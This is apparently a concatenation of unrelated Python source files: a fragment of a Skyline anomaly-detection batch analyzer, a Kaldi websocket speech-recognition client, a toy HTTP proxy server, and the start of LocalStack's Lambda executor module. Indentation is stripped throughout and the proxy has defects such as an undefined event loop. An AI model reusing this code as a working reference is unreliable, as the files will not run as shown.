str(cache_key_value))
logger.info(
'add Redis alert key - %s - %s' %
(cache_key, str(cache_key_value)))
except Exception as e:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s, %s] - %s' %
(cache_key, str(datapoint), base_name,
str(int(metric_timestamp)),
str(triggered_algorithms),
str(algorithms_run), e))
# It could have been deleted by the Roomba
except TypeError:
# @added 20200430 - Feature #3480: batch_processing
# Added logging here as the DeletedByRoomba exception is
# generally not related to that but to some other failure
# in the processing of the run algorithms phase
logger.error(traceback.format_exc())
logger.error('error :: added as DeletedByRoomba but possibly not, see traceback above')
exceptions['DeletedByRoomba'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Handle analyzer_batch work being added over and over every
# minute by also updating the last_timestamp key if stale,
# boring, etc
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(time())
self.redis_conn.setex(
last_metric_timestamp_key, 2592000, int_metric_timestamp)
logger.info('set Redis key %s to %s, even though it has been deleted by Roomba' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, even though it has been deleted by Roomba' % last_metric_timestamp_key)
except TooShort:
exceptions['TooShort'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(batch_timeseries[-1][0])
self.redis_conn.setex(
last_metric_timestamp_key, 2592000,
int_metric_timestamp)
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only log on the last data point, not on all
if int_metric_timestamp == int(last_redis_data_timestamp):
logger.info('set Redis key %s to %s, even though it is too short' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, even though it is too short' % last_metric_timestamp_key)
except Stale:
exceptions['Stale'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(batch_timeseries[-1][0])
self.redis_conn.setex(
last_metric_timestamp_key, 2592000,
int_metric_timestamp)
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only log on the last data point, not on all
if int_metric_timestamp == int(last_redis_data_timestamp):
logger.info('set Redis key %s to %s, even though it is stale' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, even though it is stale' % last_metric_timestamp_key)
except Boring:
exceptions['Boring'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(batch_timeseries[-1][0])
self.redis_conn.setex(
last_metric_timestamp_key, 2592000,
int_metric_timestamp)
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only log on the last data point, not on all
if int_metric_timestamp == int(last_redis_data_timestamp):
logger.info('set Redis key %s to %s, even though it is boring' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, even though it is boring' % last_metric_timestamp_key)
except:
logger.error(traceback.format_exc())
logger.error('error - Other error reported')
exceptions['Other'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(time())
self.redis_conn.setex(
last_metric_timestamp_key, 2592000,
int_metric_timestamp)
logger.error('error :: set Redis key %s to %s, even though another error has been thrown' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, when another exception was thrown' % last_metric_timestamp_key)
# Remove from work list
redis_set = 'analyzer.batch'
data = [metric_name, int(last_analyzed_timestamp)]
try:
self.redis_conn.srem(redis_set, str(data))
logger.info('analyzer_batch :: removed batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
try:
del timeseries
except:
pass
try:
del timestamps_to_analyse
except:
pass
try:
del batch_timeseries
except:
pass
if not batch_mode:
try:
del mirage_unique_metrics
except:
pass
try:
del ionosphere_unique_metrics
except:
pass
try:
del derivative_metrics
except:
pass
try:
del non_derivative_metrics
except:
pass
try:
del non_derivative_monotonic_metrics
except:
pass
try:
del non_smtp_alerter_metrics
except:
pass
# Add values to the queue so the parent process can collate
for key, value in anomaly_breakdown.items():
self.batch_anomaly_breakdown_q.put((key, value))
for key, value in exceptions.items():
self.batch_exceptions_q.put((key, value))
spin_end = time() - spin_start
logger.info('spin_batch_process took %.2f seconds' % spin_end)
return
def run(self):
"""
- Called when the process initializes.
- Determine if Redis is up and discover the number of `unique metrics`.
- Divide the `unique_metrics` between the number of `ANALYZER_PROCESSES`
and assign each process a set of metrics to analyse for anomalies.
- Wait for the processes to finish.
- Determine whether any anomalous metrics require:
- Alerting on (and set `EXPIRATION_TIME` key in Redis for alert).
- Feed to another module e.g. mirage.
- Alert to syslog.
- Populate the webapp json with the anomalous_metrics details.
- Log the details about the run to the skyline analyzer log.
- Send skyline.analyzer metrics to `GRAPHITE_HOST`
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
os.remove(skyline_app_logwait)
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
# @added 20190417 - Feature #2950: Report defaulted settings to log
# Added all the globally declared settings to enable reporting in the
# log the state of each setting.
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
logger.info('SERVER_METRIC_PATH is set from settings.py to %s' % str(SERVER_METRIC_PATH))
except:
SERVER_METRIC_PATH = ''
logger.info('warning :: SERVER_METRIC_PATH is not declared in settings.py, defaults to \'\'')
logger.info('skyline_app_graphite_namespace is set to %s' % str(skyline_app_graphite_namespace))
try:
ANALYZER_ENABLED = settings.ANALYZER_ENABLED
logger.info('ANALYZER_ENABLED is set to %s' % str(ANALYZER_ENABLED))
except:
ANALYZER_ENABLED = True
logger.info('warning :: ANALYZER_ENABLED is not declared in settings.py, defaults to True')
if not os.path.exists(settings.SKYLINE_TMP_DIR):
# @modified 20160803 - Adding additional exception handling to Analyzer
try:
mkdir_p(settings.SKYLINE_TMP_DIR)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to create %s' % settings.SKYLINE_TMP_DIR)
while 1:
now = time()
# Make sure Redis is up
try:
self.redis_conn.ping()
except:
logger.error(traceback.format_exc())
logger.error('error :: Analyzer cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
sleep(10)
try:
self.redis_conn = get_redis_conn(skyline_app)
except:
logger.error(traceback.format_exc())
# logger.error('error :: Analyzer cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
logger.error('error :: Analyzer cannot connect to get_redis_conn')
continue
try:
self.redis_conn_decoded.ping()
except:
logger.error(traceback.format_exc())
logger.error('error :: Analyzer batch cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
sleep(10)
try:
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
except:
logger.error(traceback.format_exc())
# logger.error('error :: Analyzer cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
logger.error('error :: Analyzer batch cannot connect to get_redis_conn')
continue
"""
Determine if any metric has been added to process
"""
while True:
# Report app up
try:
self.redis_conn.setex(skyline_app, 120, int(now))
except:
logger.error(traceback.format_exc())
logger.error('error :: Analyzer batch could not update the Redis %s key' % skyline_app)
# Discover metrics to analyze
analyzer_batch_work = None
redis_set = 'analyzer.batch'
try:
analyzer_batch_work = self.redis_conn_decoded.smembers(redis_set)
except Exception as e:
logger.error('error :: could not query Redis for set %s - %s' % (redis_set, e))
if analyzer_batch_work:
analyzer_batch_work_queue_items = len(analyzer_batch_work)
if analyzer_batch_work_queue_items > 0:
logger.info('there are %s metrics to process in the %s Redis set' % (
str(analyzer_batch_work_queue_items), redis_set))
break
else:
logger.info('there are no batch metrics to process')
sleep(1)
metric_name = None
last_analyzed_timestamp = None
for index, analyzer_batch in enumerate(analyzer_batch_work):
try:
batch_processing_metric = literal_eval(analyzer_batch)
metric_name = str(batch_processing_metric[0])
last_analyzed_timestamp = int(batch_processing_metric[1])
break
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine details from analyzer_batch entry')
metric_name = None
last_analyzed_timestamp = None
batch_processing_metric = None
sleep(1)
# @added 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# If multiple work items exist sort them by oldest timestamp and
# process the item with the oldest timestamp first
if analyzer_batch_work:
unsorted_analyzer_batch_work = []
for index, analyzer_batch in enumerate(analyzer_batch_work):
try:
batch_processing_metric = literal_eval(analyzer_batch)
metric_name = str(batch_processing_metric[0])
last_analyzed_timestamp = int(batch_processing_metric[1])
unsorted_analyzer_batch_work.append([metric_name, last_analyzed_timestamp])
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine details from analyzer_batch entry')
sorted_analyzer_batch_work = sorted(unsorted_analyzer_batch_work, key=lambda x: x[1])
logger.info('there are %s work items in the sorted_analyzer_batch_work list' % (str(len(sorted_analyzer_batch_work))))
# @added 20201017 - Feature #3818: ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED
# Remove multiple entries for metrics and only add the latest
# timestamp item per metric
original_work_queue_length = len(sorted_analyzer_batch_work)
metrics = list(set([item[0] for item in sorted_analyzer_batch_work]))
logger.info('there are %s unique metrics with work items in the sorted_analyzer_batch_work list' % (str(len(metrics))))
if len(metrics) < original_work_queue_length:
new_analyzer_batch_work = []
for metric in metrics:
work_timestamps = []
for item in sorted_analyzer_batch_work:
if item[0] == metric:
timestamp = item[1]
work_timestamps.append(timestamp)
new_analyzer_batch_work.append([metric, timestamp])
if len(work_timestamps) > 1:
last_work_timestamp = work_timestamps[-1]
for work_timestamp in work_timestamps:
if work_timestamp != last_work_timestamp:
# Remove from work list
redis_set = 'analyzer.batch'
data = [metric, int(work_timestamp)]
try:
self.redis_conn.srem('analyzer.batch', str(data))
logger.info('analyzer_batch :: newer work exists, removed older work item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove older work item - %s - from Redis set - %s' % (str(data), redis_set))
sorted_analyzer_batch_work = sorted(new_analyzer_batch_work, key=lambda x: x[1])
new_work_queue_length = len(sorted_analyzer_batch_work)
if original_work_queue_length != new_work_queue_length:
pruned_item_count = original_work_queue_length - new_work_queue_length
logger.info('the analyzer.batch Redis set was pruned of %s older items which have newer work items' % str(pruned_item_count))
metric_name = str(sorted_analyzer_batch_work[0][0])
last_analyzed_timestamp = int(sorted_analyzer_batch_work[0][1])
batch_processing_metric = [metric_name, last_analyzed_timestamp]
if not metric_name:
break
# @added 20200904 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Task #3730: Validate Mirage running multiple processes
# Remove any existing algorithm.error and timing files from any
# previous runs
pattern = '%s.*.algorithm.error' % skyline_app
try:
for f in os.listdir(settings.SKYLINE_TMP_DIR):
if re.search(pattern, f):
try:
os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f))
logger.info('cleaning up old error file - %s' % (str(f)))
except OSError:
pass
except:
logger.error('error :: failed to cleanup algorithm.error files')
logger.info(traceback.format_exc())
pattern = '%s.*.algorithm.timings' % skyline_app
try:
for f in os.listdir(settings.SKYLINE_TMP_DIR):
if re.search(pattern, f):
try:
os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f))
logger.info('cleaning up old timings file - %s' % (str(f)))
except OSError:
pass
except:
logger.error('error :: failed to cleanup algorithm.timing files')
logger.info(traceback.format_exc())
logger.info('processing - %s' % str(batch_processing_metric))
# Spawn processes
batch_pids = []
spawned_batch_pids = []
batch_pid_count = 0
run_timestamp = now
for i in range(1, 2):
if BATCH_MODE:
batch_p = Process(target=self.spin_batch_process, args=(i, run_timestamp, 'batch_mode', 0, sorted_analyzer_batch_work[0:300]))
else:
batch_p = Process(target=self.spin_batch_process, args=(i, run_timestamp, metric_name, last_analyzed_timestamp))
batch_pids.append(batch_p)
batch_pid_count += 1
logger.info('starting 1 of %s spin_batch_process' % (str(batch_pid_count)))
batch_p.start()
spawned_batch_pids.append(batch_p.pid)
# Send wait signal to zombie processes
# for p in pids:
# p.join()
# Self monitor processes and terminate if any spin_batch_process
# that has run for longer than 300 seconds
p_starts = time()
while time() - p_starts <= 300:
if any(p.is_alive() for p in batch_pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info('1 spin_batch_process completed in %.2f seconds' % (time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all spin_batch_process processes')
for p in batch_pids:
p.terminate()
# p.join()
for p in batch_pids:
if p.is_alive():
logger.info('stopping spin_process - %s' % (str(p.is_alive())))
p.join()
# Grab data from the queue and populate dictionaries
exceptions = dict()
anomaly_breakdown = dict()
while 1:
try:
key, value = self.batch_anomaly_breakdown_q.get_nowait()
if key not in anomaly_breakdown.keys():
anomaly_breakdown[key] = value
else:
anomaly_breakdown[key] += value
except Empty:
break
while 1:
try:
key, value = self.batch_exceptions_q.get_nowait()
if key not in exceptions.keys():
exceptions[key] = value
else:
exceptions[key] += value
except Empty:
break
# @added 20200904 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Task #3730: Validate Mirage running multiple processes
# Report any algorithm errors
pattern = '%s.*.algorithm.error' % skyline_app
try:
for f in os.listdir(settings.SKYLINE_TMP_DIR):
if re.search(pattern, f):
try:
algorithm_error_file = os.path.join(settings.SKYLINE_TMP_DIR, f)
if os.path.isfile(algorithm_error_file):
logger.error('error :: error reported in %s' % (
algorithm_error_file))
try:
with open(algorithm_error_file, 'r') as f:
error_string = f.read()
logger.error('%s' % str(error_string))
except:
logger.error('error :: failed to read error file - %s' % algorithm_error_file)
try:
os.remove(algorithm_error_file)
except OSError:
pass
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check algorithm errors')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check algorithm errors')
# @added 20191021 - Bug #3288: Always send anomaly_breakdown and exception metrics
# Branch #3262: py3
exceptions_metrics = ['Boring', 'Stale', 'TooShort', 'Other']
try:
for i_exception in exceptions_metrics:
if i_exception not in exceptions.keys():
exceptions[i_exception] = 0
# @added 20200607 - Feature #3566: custom_algorithms
anomaly_breakdown_algorithms = list(settings.ALGORITHMS)
if CUSTOM_ALGORITHMS:
for custom_algorithm in settings.CUSTOM_ALGORITHMS:
anomaly_breakdown_algorithms.append(custom_algorithm)
# @modified 20200607 - Feature #3566: custom_algorithms
# for i_anomaly_breakdown in settings.ALGORITHMS:
for i_anomaly_breakdown in anomaly_breakdown_algorithms:
if i_anomaly_breakdown not in anomaly_breakdown.keys():
anomaly_breakdown[i_anomaly_breakdown] = 0
exceptions_string = ''
for i_exception in exceptions.keys():
if exceptions_string == '':
exceptions_string = '%s: %s' % (str(i_exception), str(exceptions[i_exception]))
else:
exceptions_string = '%s, %s: %s' % (exceptions_string, str(i_exception), str(exceptions[i_exception]))
logger.info('exceptions - %s' % str(exceptions_string))
anomaly_breakdown_string = ''
if anomaly_breakdown:
for i_anomaly_breakdown in anomaly_breakdown.keys():
if anomaly_breakdown_string == '':
anomaly_breakdown_string = '%s: %s' % (str(i_anomaly_breakdown), str(anomaly_breakdown[i_anomaly_breakdown]))
else:
anomaly_breakdown_string = '%s, %s: %s' % (anomaly_breakdown_string, str(i_anomaly_breakdown), str(anomaly_breakdown[i_anomaly_breakdown]))
logger.info('anomaly_breakdown - %s' % str(anomaly_breakdown_string))
else:
logger.info('anomaly_breakdown - none, no anomalies')
except:
logger.error(traceback.format_exc())
logger.error('error :: could not report exceptions and anomaly_breakdown details')
try:
del exceptions
except:
pass
try:
del anomaly_breakdown
except:
pass
try:
with self.batch_exceptions_q.mutex:
self.batch_exceptions_q.queue.clear()
except:
pass
try:
with self.batch_anomaly_breakdown_q.mutex:
self.batch_anomaly_breakdown_q.queue.clear()
except:
pass
|
client.py
|
__author__ = 'tanel'
import argparse
from ws4py.client.threadedclient import WebSocketClient
import time
import threading
import sys
import urllib
import queue as Queue
#from multiprocessing import Queue
import json
import time
import os
def rate_limited(maxPerSecond):
minInterval = 1.0 / float(maxPerSecond)
def decorate(func):
lastTimeCalled = [0.0]
def rate_limited_function(*args,**kargs):
elapsed = time.perf_counter() - lastTimeCalled[0]  # time.clock() was removed in Python 3.8
leftToWait = minInterval - elapsed
if leftToWait>0:
time.sleep(leftToWait)
ret = func(*args,**kargs)
lastTimeCalled[0] = time.perf_counter()
return ret
return rate_limited_function
return decorate
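# Used below as @rate_limited(4), calls to the decorated function are
# spaced at least minInterval (0.25 seconds) apart by sleeping out the
# remainder of each interval before calling.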
class MyClient(WebSocketClient):
def __init__(self, audiofile, url, protocols=None, extensions=None, heartbeat_freq=None, byterate=32000,
save_adaptation_state_filename=None, send_adaptation_state_filename=None):
super(MyClient, self).__init__(url, protocols, extensions, heartbeat_freq)
self.final_hyps = []
self.audiofile = audiofile
self.byterate = byterate
self.final_hyp_queue = Queue.Queue()
self.save_adaptation_state_filename = save_adaptation_state_filename
self.send_adaptation_state_filename = send_adaptation_state_filename
@rate_limited(4)
def send_data(self, data):
self.send(data, binary=True)
def opened(self):
print("Socket opened!")
def send_data_to_ws():
if self.send_adaptation_state_filename is not None:
#print >> sys.stderr, "Sending adaptation state from %s" % self.send_adaptation_state_filename
try:
adaptation_state_props = json.load(open(self.send_adaptation_state_filename, "r"))
self.send(json.dumps(dict(adaptation_state=adaptation_state_props)))
except:
e = sys.exc_info()[0]
#print >> sys.stderr, "Failed to send adaptation state: ", e
with self.audiofile as audiostream:
for block in iter(lambda: audiostream.read(self.byterate // 4), b""):
self.send_data(block)
#print >> sys.stderr, "Audio sent, now sending EOS"
self.send("EOS")
t = threading.Thread(target=send_data_to_ws)
t.start()
def received_message(self, m):
response = json.loads(str(m))
#print >> sys.stderr, "RESPONSE:", response
#print >> sys.stderr, "JSON was:", m
if response['status'] == 0:
if 'result' in response:
trans = response['result']['hypotheses'][0]['transcript']  # keep as str in Python 3
if response['result']['final']:
#print >> sys.stderr, trans,
self.final_hyps.append(trans)
#print >> sys.stderr, '\r%s' % trans.replace("\n", "\\n")
else:
print_trans = trans.replace("\n", "\\n")
if len(print_trans) > 80:
print_trans = "... %s" % print_trans[-76:]
#print >> sys.stderr, '\r%s' % print_trans,
if 'adaptation_state' in response:
if self.save_adaptation_state_filename:
#print >> sys.stderr, "Saving adaptation state to %s" % self.save_adaptation_state_filename
with open(self.save_adaptation_state_filename, "w") as f:
f.write(json.dumps(response['adaptation_state']))
else:
#print >> sys.stderr, "Received error from server (status %d)" % response['status']
if 'message' in response:
print("Error message:", response['message'])
#print >> sys.stderr, "Error message:", response['message']
def get_full_hyp(self, timeout=60):
return self.final_hyp_queue.get(timeout=timeout)
def closed(self, code, reason=None):
#print "Websocket closed() called"
#print >> sys.stderr
self.final_hyp_queue.put(" ".join(self.final_hyps))
def main(file_bytes, rate=3200):
port = os.environ['GSTREAM_PORT']
uri = 'ws://' + os.environ['ASR_SERVER']+':'+str(port) + '/client/ws/speech'
'''parser = argparse.ArgumentParser(description='Command line client for kaldigstserver')
parser.add_argument('-u', '--uri', default="ws://localhost:8888/client/ws/speech", dest="uri", help="Server websocket URI")
parser.add_argument('-r', '--rate', default=32000, dest="rate", type=int, help="Rate in bytes/sec at which audio should be sent to the server. NB! For raw 16-bit audio it must be 2*samplerate!")
parser.add_argument('--save-adaptation-state', help="Save adaptation state to file")
parser.add_argument('--send-adaptation-state', help="Send adaptation state from file")
parser.add_argument('--content-type', default='', help="Use the specified content type (empty by default, for raw files the default is audio/x-raw, layout=(string)interleaved, rate=(int)<rate>, format=(string)S16LE, channels=(int)1")
parser.add_argument('audiofile', help="Audio file to be sent to the server", type=argparse.FileType('rb'), default=sys.stdin)
args = parser.parse_args()'''
content_type = ''
'''if content_type == '' and args.audiofile.name.endswith(".raw"):
content_type = "audio/x-raw, layout=(string)interleaved, rate=(int)%d, format=(string)S16LE, channels=(int)1" %(args.rate/2)'''
ws = MyClient(file_bytes, uri + '?%s' % (urllib.parse.urlencode([("content-type", content_type)])), byterate=rate)
ws.connect()
result = ws.get_full_hyp()
print(result, flush=True)
|
proxyserver.py
|
#!/usr/bin/env python3
import socket
from types import ModuleType
import sys
import threading
import logging
from collections import OrderedDict, namedtuple
import asyncio
import errno
import base64
HOST = "127.0.0.1"
PORT = 9995
LISTEN = 10
FAILURE = 1
MAX_REQUEST_BYTES = 8192 # HTTP 1.1
logging.basicConfig(format='[%(asctime)s] %(message)s',
level=logging.INFO,
datefmt='%Y-%m-%d %H:%M:%S')
class DestinationRequired(Exception):
pass
class PortInUseException(Exception):
pass
class Socket(socket.socket):
def __init__(self, *args, **kwargs):
super(Socket, self).__init__(*args, **kwargs)
self.sock = None
def tcp_socket(self):
self.sock = Socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return self.sock
def settimeout(self, value):
if value > 30:
raise ValueError(
'Set max timeout 30 seconds.'
)
return super().settimeout(value)
def udp_socket(self):
raise NotImplementedError(
'implement `udp_socket` if needed'
)
class AsyncTCPConnection(Socket):
__listen = 10
def __init__(self, host, port):
self.host = host
try:
self.port = int(port)
except ValueError:
sys.stderr.write('Port should be an integer!\nConnection abort')
sys.exit(1)
async def __aenter__(self):
try:
self.sock = self.tcp_socket()
self.sock.bind((self.host, self.port))
self.sock.listen(self.__listen)
self.sock.settimeout(20)
logging.info(f"Listening on {self.host}:{self.port}")
return self.sock
except socket.error as err:
# only catch the errors caused by an invalid address or
# insufficient port permissions and raise them with a clear
# message; any other error is simply re-raised.
if err.errno == errno.EACCES:
msg = 'Permission denied! Run the script as an administrator'
raise DestinationRequired(msg)
elif err.errno == errno.EADDRINUSE:
msg = 'Port already in use! Change or kill the running port.'
raise PortInUseException(msg)
else:
raise err
async def __aexit__(self, *args):
if getattr(self, 'sock', None):
logging.info("Closing connection")
self.sock.close()
class InvalidRequest(Exception):
pass
class DNSLookupError(Exception):
pass
class BaseRequest:
_methods = OrderedDict({
'get':'GET',
'post':'POST',
'put':'PUT',
'delete':'DELETE',
'connect': 'CONNECT'
})
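# Only the methods above are proxied, anything else makes
# proxy_handler raise InvalidRequest.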
def __init__(self, request, acsii=None):
self.header = None
self._encoding = acsii if acsii else 'utf-8'
self._request = request
def get_headers(self):
return self._request.decode(self._encoding).split('\r\n')
def gethostbyname(self, host):
try:
return socket.gethostbyname(host)
except socket.error:
raise DNSLookupError(
'Cannot resolve ip address! Dns lookup failed.'
)
def scheme(self):
raise NotImplementedError()
def encoding(self):
return self._encoding
@property
def method(self):
return self._methods.get(self.getmethod().lower(), None)
class Request(BaseRequest):
"""
TODO: Handles request, prepare headers, Auth, cookies and etc.
"""
def __init__(self, request, scheme='basic', decode=base64.b64decode):
super().__init__(request)
self.auth_scheme = scheme
self.decode = decode
self._requestline = namedtuple('Line', 'method url protocol')
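# Line holds the three parts of the HTTP request line,
# e.g. ('GET', 'http://example.com/', 'HTTP/1.1')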
@property
def headers(self) -> list:
try:
return self.get_headers()
except Exception as decode_error:
raise InvalidRequest(
f'failed to decode request headers, used encoding {self.encoding()}'
) from decode_error
@property
def extract_request_line(self):
method, url, protocol, *rm = str(self.headers[0]).split()
return self._requestline(method, url, protocol)
def getmethod(self):
return self.extract_request_line.method
@property
def geturl(self):
url = self.extract_request_line.url.split('://')[-1]
remote_url = url.split(':')
if len(remote_url) == 2:
host, port = remote_url
return (str(host), int(port))
elif len(remote_url) == 1:
return (str(remote_url[0]), None)
else:
return (str(url), None)
def get_auth(self):
proxy_auth = None
for string in self.headers:
if 'Proxy-Authorization' in string:
proxy_auth = string
break
if not proxy_auth:
return False
return proxy_auth.split()
def auth_scheme(self):
assert self.get_auth() and len(self.get_auth()) > 2
assert self.get_auth()[1].lower() == self.auth_scheme, (
'Unsupported auth scheme.'
)
def formatted(self):
method = self.extract_request_line.method
url = self.extract_request_line.url
protocol = self.extract_request_line.protocol
if 'http' in protocol.lower():
protocol = 'HTTP/1.1'
if not str(url).startswith(('http://', 'https://')):
if url.startswith('www'):
url = f'https://{url}'
else:
url = f'https://www.{url}'
host, _ =self.geturl
client_rq = f'{method} {url} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: python-requests/2.22.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n'
return client_rq.encode('utf-8')
def credentials(self):
crd = self.get_auth()[-1]
try:
return self.base64_decode(crd)
except Exception:
return (None,
None)
def base64_decode(self, data):
try:
data = self.decode(data).decode()
except UnicodeDecodeError:
pass
username, password, *rm = data.split(':')
return (
username,
password,
)
def auth_check(self):
pass
class ProxyServer:
def __init__(self, host, port):
self.host = host
self.port = port
self.sock = None
def send(self):
pass
def connect(self):
pass
def proxy_handler(self, client_socket):
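# Handle a single client connection, parse the HTTP request, resolve
# the upstream host, forward a rewritten request and relay the response
# bytes back to the client.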
request = client_socket.recv(MAX_REQUEST_BYTES)
r = Request(
request=request
)
if not r.method:
raise InvalidRequest(
f'{r.getmethod()} not allowed'
)
host, port = r.geturl
if not port:
port = 80
request = r.formatted()
ip = None
try:
ip = socket.gethostbyname(host)
except socket.error:
raise DNSLookupError
assert ip, (
'Cannot resolve ip address.'
)
# Remote server socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.sendall(request)
while True:
data = s.recv(4096)
if (len(data) > 0):
client_socket.send(data)
else:
break
async def _runprocess(self):
async with AsyncTCPConnection(host=self.host, port=self.port) as connection:
terminate = False
while not terminate:
client, _ = connection.accept()
d = threading.Thread(target=self.proxy_handler, args=(client, ))
                d.daemon = True
d.start()
def start(self):
self.loop.run_until_complete(self._runprocess())
|
lambda_executors.py
|
import os
import re
import json
import time
import logging
import threading
import subprocess
from multiprocessing import Process, Queue
try:
from shlex import quote as cmd_quote
except ImportError:
from pipes import quote as cmd_quote # for Python 2.7
from localstack import config
from localstack.utils.aws import aws_stack
from localstack.utils.common import (
CaptureOutput, FuncThread, TMP_FILES, short_uid, save_file,
to_str, run, cp_r, json_safe, get_free_tcp_port)
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER
LAMBDA_RUNTIME_PYTHON27 = 'python2.7'
LAMBDA_RUNTIME_PYTHON36 = 'python3.6'
LAMBDA_RUNTIME_NODEJS = 'nodejs'
LAMBDA_RUNTIME_NODEJS610 = 'nodejs6.10'
LAMBDA_RUNTIME_NODEJS810 = 'nodejs8.10'
LAMBDA_RUNTIME_NODEJS10X = 'nodejs10.x'
LAMBDA_RUNTIME_JAVA8 = 'java8'
LAMBDA_RUNTIME_DOTNETCORE2 = 'dotnetcore2.0'
LAMBDA_RUNTIME_DOTNETCORE21 = 'dotnetcore2.1'
LAMBDA_RUNTIME_GOLANG = 'go1.x'
LAMBDA_RUNTIME_RUBY = 'ruby'
LAMBDA_RUNTIME_RUBY25 = 'ruby2.5'
LAMBDA_RUNTIME_CUSTOM_RUNTIME = 'provided'
LAMBDA_EVENT_FILE = 'event_file.json'
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
class LambdaExecutor(object):
""" Base class for Lambda executors. Subclasses must overwrite the _execute method """
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def execute(self, func_arn, func_details, event, context=None, version=None, asynchronous=False):
def do_execute(*args):
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
try:
result, log_output = self._execute(func_arn, func_details, event, context, version)
finally:
self.function_invoke_times[func_arn] = invocation_time
# forward log output to cloudwatch logs
self._store_logs(func_details, log_output, invocation_time)
# return final result
return result, log_output
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug('Lambda executed in Event (asynchronous) mode, no response from this '
'function will be returned to caller')
FuncThread(do_execute).start()
return None, 'Lambda executed asynchronously.'
return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
""" This method must be overwritten by subclasses. """
raise Exception('Not implemented.')
def startup(self):
pass
def cleanup(self, arn=None):
pass
def _store_logs(self, func_details, log_output, invocation_time):
if not aws_stack.is_service_enabled('logs'):
return
